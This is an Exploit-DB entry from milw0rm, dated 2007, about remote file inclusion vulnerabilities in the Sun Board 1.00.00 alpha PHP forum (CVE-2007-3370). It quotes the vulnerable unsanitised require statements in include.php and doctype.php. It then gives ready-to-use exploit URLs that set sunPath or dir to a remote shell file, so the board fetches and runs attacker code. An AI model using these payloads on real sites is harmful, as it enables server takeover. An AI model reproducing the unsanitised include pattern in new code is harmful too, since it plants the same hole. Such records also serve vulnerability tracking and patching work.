Sun Board 1.00.00 alpha Remote File Inclusion Vulnerabilities

2007-06-22T00:00:00
ID EDB-ID:4091
Type exploitdb
Reporter GoLd_M
Modified 2007-06-22T00:00:00

Description

Sun Board 1.00.00 alpha Remote File Inclusion Vulnerabilities. CVE-2007-3370. Webapps exploit for php platform

                                        
                                            # Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities

# D.Script :
      http://mesh.dl.sourceforge.net/sourceforge/sunboard/sunboard.zip

# V.Code :
      require $sunPath.'config.php';
      require_once $sunPath.'dbms/'.$dbtype.'.php';
# In :
      /include.php

# Exploits :
      /include.php?sunPath=Shell.txt?

# V.Code 2 :
      <?php require_once $dir.'/lib.php'; ?>

# In :
      /skin/board/default/doctype.php

# Exploits 2 :
      /skin/board/default/doctype.php?dir=Shell.txt?

# Discovered by:
      GoLd_M = [Mahmood_ali]

# Homepage:
      http://www.Tryag.Com/cc

# Sp.Thanx To :
      Tryag-Team & Asb-May's Group

# milw0rm.com [2007-06-22]